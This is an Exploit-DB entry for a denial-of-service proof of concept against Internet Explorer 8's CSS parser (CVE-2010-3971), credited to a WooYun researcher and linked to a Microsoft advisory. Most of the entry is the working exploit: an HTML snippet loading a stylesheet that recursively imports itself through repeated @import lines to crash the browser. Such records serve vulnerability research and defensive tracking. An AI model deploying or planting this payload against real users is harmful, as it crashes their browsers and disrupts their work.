Microsoft Internet Explorer 8 - CSS Parser Denial of Service

Author: WooYun
type: dos
platform: windows
port: 
date_added: 2010-12-08 
date_updated: 2010-12-08 
verified: 1 
codes: CVE-2010-3971;OSVDB-69796 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-12-08-at-13706-pm.png 
application_url: 

<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>

<code of css.css>
*{
 color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>


Exploit-DB Notes:
* Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲".
WooYun is a connection platform for vendors and security researchers:
http://www.wooyun.org/bugs/wooyun-2010-0885

* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
http://www.microsoft.com/technet/security/advisory/2488013.mspx